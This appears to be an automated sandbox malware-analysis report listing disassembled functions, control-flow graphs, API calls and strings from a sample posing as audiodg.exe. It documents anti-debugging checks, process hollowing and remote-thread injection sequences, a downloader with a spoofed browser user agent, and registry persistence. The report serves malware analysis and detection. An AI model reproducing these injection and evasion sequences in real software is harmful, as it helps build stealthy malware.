                                                                                                                                                                                                                                  control_flow_graph 231 7ff6dab83414-7ff6dab8342a call 7ff6dab8153c call 7ff6dab831b4 236 7ff6dab8342c-7ff6dab8342e ExitProcess 231->236 237 7ff6dab83434-7ff6dab83462 call 7ff6dab840ac call 7ff6dab83cac call 7ff6dab83edc 231->237 244 7ff6dab83464-7ff6dab83475 call 7ff6dab841ec 237->244 245 7ff6dab834b3-7ff6dab834c6 call 7ff6dab83edc 237->245 252 7ff6dab8348a-7ff6dab8348c ExitProcess 244->252 253 7ff6dab83477-7ff6dab83488 call 7ff6dab841ec 244->253 250 7ff6dab834c8-7ff6dab834d9 call 7ff6dab841ec 245->250 251 7ff6dab83504-7ff6dab83517 call 7ff6dab83edc 245->251 263 7ff6dab834db-7ff6dab834dd ExitProcess 250->263 264 7ff6dab834e3 call 7ff6dab83214 250->264 261 7ff6dab8355a-7ff6dab83570 call 7ff6dab83a3c call 7ff6dab833a4 251->261 262 7ff6dab83519-7ff6dab8352a call 7ff6dab841ec 251->262 253->252 260 7ff6dab83492 call 7ff6dab832a4 253->260 270 7ff6dab83497-7ff6dab8349c 260->270 282 7ff6dab835c6-7ff6dab8369e CreateThread * 3 WaitForMultipleObjects ExitProcess 261->282 283 7ff6dab83572-7ff6dab83583 call 7ff6dab841ec 261->283 278 7ff6dab8352c-7ff6dab8352e ExitProcess 262->278 279 7ff6dab83534 call 7ff6dab83214 262->279 272 7ff6dab834e8-7ff6dab834ed 264->272 276 7ff6dab834ab-7ff6dab834ad ExitProcess 270->276 277 7ff6dab8349e-7ff6dab834a9 Sleep 270->277 273 7ff6dab834fc-7ff6dab834fe ExitProcess 272->273 274 7ff6dab834ef-7ff6dab834fa Sleep 272->274 274->272 277->270 284 7ff6dab83539-7ff6dab8353e 279->284 289 7ff6dab83598-7ff6dab8359a ExitProcess 283->289 290 7ff6dab83585-7ff6dab83596 call 7ff6dab841ec 283->290 286 7ff6dab8354d-7ff6dab8354f ExitProcess 284->286 287 7ff6dab83540-7ff6dab8354b Sleep 284->287 287->284 290->289 293 7ff6dab835a0 call 7ff6dab832a4 290->293 295 7ff6dab835a5-7ff6dab835aa 293->295 296 7ff6dab835ac-7ff6dab835b7 Sleep 295->296 297 7ff6dab835b9-7ff6dab835bb ExitProcess 295->297 296->295
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                                  • API String ID: 613740775-1953711635
                                                                                                                                                                                                                                  • Opcode ID: 125b4186e6bdf87d64f30280a71d71007137904f3c8ddafee214066f57080cbf
                                                                                                                                                                                                                                  • Instruction ID: c4004847fcbbce935dae6fe23126de491b8653f9a5651819e420b402aa7900d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 125b4186e6bdf87d64f30280a71d71007137904f3c8ddafee214066f57080cbf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8612D3190EA4382FA64AB79E8553BE2260BF46740F4400B7D54EC66E7DE2DE42BD740
                                                                                                                                                                                                                                  Function 00007FF6DAB840AC Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                                                                                  • Opcode ID: 2dc5b7a4c2ac788fed40c1e4fd08826e44c1b763e7fe3fa29ec32dd5f663f271
                                                                                                                                                                                                                                  • Instruction ID: d1a53dd2b9177cf92f938154683c311c4059b8e4ff4ab064d9e9416407438a8e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dc5b7a4c2ac788fed40c1e4fd08826e44c1b763e7fe3fa29ec32dd5f663f271
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9312A3261DA8287D750DB69E45072EBB60FBDA790F104036FA8E83B69DF3DD4568B00
                                                                                                                                                                                                                                  Function 00007FF6DAB831B4 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                                                                                  • Opcode ID: fb95f8ef0bc2ecc5dce42075ca2d6b9f5b34f365682c0d1478ff1e2aa5af605c
                                                                                                                                                                                                                                  • Instruction ID: f8a8cceaf9afffc434b7d37890645e530c0e06c92954d4ac00d6c13a7d36cf54
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb95f8ef0bc2ecc5dce42075ca2d6b9f5b34f365682c0d1478ff1e2aa5af605c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF0542090E683C2E7306B79641433D57A0BB47B48F0401F6D58D85696CF6DE51BDB11
                                                                                                                                                                                                                                  Function 00007FF6DAB841EC Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4294037311-0
                                                                                                                                                                                                                                  • Opcode ID: 6cd4be96b73e2e358251bb5f19c04d187c7d5a97317c3e6dfd68f5ff4f2f9845
                                                                                                                                                                                                                                  • Instruction ID: 1a59f6564912dd9d65cab714265255974ce8905825cc4815ffc77781cf0f60ed
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cd4be96b73e2e358251bb5f19c04d187c7d5a97317c3e6dfd68f5ff4f2f9845
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27F0653591DA83C2EA709F74E40437EA370FB9B740F5005B6E58E826A6CF3DD4279600
                                                                                                                                                                                                                                  Function 00007FF6DAB814EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 328 7ff6dab814ec-7ff6dab81528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                                                                                  • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                                  • Instruction ID: e079bd76f8dbbfdc321609a9a09bafcb2cae9d0115c1263e3087571d1ac42352
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83E09276509F81C6C6209B15F84001EB7B4FBC97D4F504125EACD82B28CF3CC165CB00
                                                                                                                                                                                                                                  Function 00007FF6DAB83AEC Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 329 7ff6dab83aec-7ff6dab83afb 330 7ff6dab83afd-7ff6dab83b0a VirtualFree 329->330 331 7ff6dab83b10-7ff6dab83b14 329->331 330->331
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                  • Opcode ID: 030cb471ab07ba67b75c17a021bb035fd128cd39a350b8677565999cf01361e6
                                                                                                                                                                                                                                  • Instruction ID: c48981f561835795ae6cb6de110a7929017f3d5a3d55f0e15a32367dce83ad4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 030cb471ab07ba67b75c17a021bb035fd128cd39a350b8677565999cf01361e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5D01311F3DD42C1E754A736D44571D5250FBC5744F408075D68941555CF3CC0A58F00

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00007FF6DAB824D4 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 332 7ff6dab824d4-7ff6dab8254e GetModuleFileNameW 333 7ff6dab82555-7ff6dab82591 332->333 334 7ff6dab82550 332->334 336 7ff6dab825a9-7ff6dab825c5 call 7ff6dab82414 333->336 337 7ff6dab82593-7ff6dab8259b 333->337 335 7ff6dab82df9-7ff6dab82e01 334->335 347 7ff6dab82608-7ff6dab82612 336->347 338 7ff6dab8259d-7ff6dab825a5 337->338 339 7ff6dab825c7-7ff6dab825e3 call 7ff6dab82454 337->339 341 7ff6dab825a7-7ff6dab82603 338->341 342 7ff6dab825e5-7ff6dab82601 call 7ff6dab82494 338->342 339->347 341->335 342->347 350 7ff6dab82619-7ff6dab8266d CreateProcessW 347->350 351 7ff6dab82614 347->351 352 7ff6dab82674-7ff6dab826b4 CreateFileW 350->352 353 7ff6dab8266f 350->353 351->335 354 7ff6dab826bb-7ff6dab826d7 GetFileSize 352->354 355 7ff6dab826b6 352->355 353->335 356 7ff6dab826d9-7ff6dab826e1 354->356 357 7ff6dab826e3-7ff6dab826ee CloseHandle 354->357 355->335 356->357 358 7ff6dab826f3-7ff6dab8271b VirtualAlloc 356->358 357->335 359 7ff6dab8272d-7ff6dab82758 ReadFile 358->359 360 7ff6dab8271d-7ff6dab82728 CloseHandle 358->360 361 7ff6dab8277d-7ff6dab827cb CloseHandle GetThreadContext 359->361 362 7ff6dab8275a-7ff6dab82778 VirtualFree CloseHandle 359->362 360->335 363 7ff6dab827cd-7ff6dab827e0 VirtualFree 361->363 364 7ff6dab827e5-7ff6dab8286a ReadProcessMemory GetModuleHandleA GetProcAddress 361->364 362->335 363->335 366 7ff6dab8286c-7ff6dab8287f VirtualFree 364->366 367 7ff6dab82884-7ff6dab828ed VirtualAllocEx 364->367 366->335 368 7ff6dab82907-7ff6dab8293b WriteProcessMemory 367->368 369 7ff6dab828ef-7ff6dab82902 VirtualFree 367->369 370 7ff6dab8293d-7ff6dab82950 VirtualFree 368->370 371 7ff6dab82955-7ff6dab82960 368->371 369->335 370->335 372 7ff6dab82972-7ff6dab82985 371->372 373 7ff6dab8298b-7ff6dab82a14 WriteProcessMemory 372->373 374 7ff6dab82a33-7ff6dab82a7a 372->374 376 7ff6dab82a16-7ff6dab82a29 VirtualFree 373->376 377 7ff6dab82a2e 373->377 375 7ff6dab82a8c-7ff6dab82a9f 374->375 379 7ff6dab82aa5-7ff6dab82af4 RtlCompareMemory 375->379 380 7ff6dab82d24-7ff6dab82da8 WriteProcessMemory SetThreadContext 375->380 376->335 377->372 381 7ff6dab82af8-7ff6dab82b21 379->381 382 7ff6dab82af6 379->382 383 7ff6dab82daa-7ff6dab82dbd VirtualFree 380->383 384 7ff6dab82dbf-7ff6dab82dcf ResumeThread 380->384 386 7ff6dab82b2c-7ff6dab82b3a 381->386 382->375 383->335 387 7ff6dab82de6-7ff6dab82df3 VirtualFree 384->387 388 7ff6dab82dd1-7ff6dab82de4 VirtualFree 384->388 389 7ff6dab82b40-7ff6dab82bcb 386->389 390 7ff6dab82d1f 386->390 387->335 388->335 391 7ff6dab82bdd-7ff6dab82beb 389->391 390->380 392 7ff6dab82d1a 391->392 393 7ff6dab82bf1-7ff6dab82c24 391->393 392->386 394 7ff6dab82c28-7ff6dab82cfb ReadProcessMemory WriteProcessMemory 393->394 395 7ff6dab82c26 393->395 397 7ff6dab82cfd-7ff6dab82d10 VirtualFree 394->397 398 7ff6dab82d15 394->398 395->391 397->335 398->392
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                                                                                  • Opcode ID: 76c44906d555fc5b1354a9702e756fd3432a91cc5b77d436d86a9f4b2e36bb47
                                                                                                                                                                                                                                  • Instruction ID: b5b93debbded570225bafd8945699b9a40254314e4211b5e94fa173bd9f9231b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76c44906d555fc5b1354a9702e756fd3432a91cc5b77d436d86a9f4b2e36bb47
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3320A3660DBC286D774CB2AE8543AEB7A0FB89B84F004136DA9D83B59DF3CD4558B01
                                                                                                                                                                                                                                  Function 00007FF6DAB810D8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: OpenProcess
                                                                                                                                                                                                                                  • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                                  • API String ID: 3743895883-721857904
                                                                                                                                                                                                                                  • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                                  • Instruction ID: f5d618eb4058e31145c2abb342fd3aa66138dad9784c5e79db2f714f1a0fa978
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7711C3190EB8286E7709B29F44436EB3A0FB86784F509176D68DC2B99DF7CD496CB40
                                                                                                                                                                                                                                  Function 00007FF6DAB82168 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF6DAB821A5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                                  • Opcode ID: 4f77daa9b4afcd7238f1659cf5dbd7bb3687eb2434c9a3b17e92dc5a8002e488
                                                                                                                                                                                                                                  • Instruction ID: dfc0c6e7709871bd8de495c46361c8665f344c100c2e1d5cb0902672933dbcbc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f77daa9b4afcd7238f1659cf5dbd7bb3687eb2434c9a3b17e92dc5a8002e488
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64711A3251DA8286E7609F68F45432EB760FBCA794F505076FA8E83B69CF7CD4558B00
                                                                                                                                                                                                                                  Function 00007FF6DAB8452C Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2693768547-0
                                                                                                                                                                                                                                  • Opcode ID: 482500e96dd0987bd15cea92275c1105989086282f4efcfdaf5ed813befa3f18
                                                                                                                                                                                                                                  • Instruction ID: 8f103e713de61d833b5dd675fd82449f5369515e5f9b56286baf6e06abf260a1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 482500e96dd0987bd15cea92275c1105989086282f4efcfdaf5ed813befa3f18
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D81ED3660DB8286EA60CB69F44436EB7A0FBC9B95F104176DA8D83769DF7CD055CB00
                                                                                                                                                                                                                                  Function 00007FF6DAB83074 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8440C: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB830AF), ref: 00007FF6DAB84454
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8440C: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB830AF), ref: 00007FF6DAB84491
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8440C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB830AF), ref: 00007FF6DAB8449C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB83B4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB830B4), ref: 00007FF6DAB83B8F
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB83B4C: RegSetValueExW.ADVAPI32 ref: 00007FF6DAB83BC5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB83B4C: RegCloseKey.ADVAPI32 ref: 00007FF6DAB83BD4
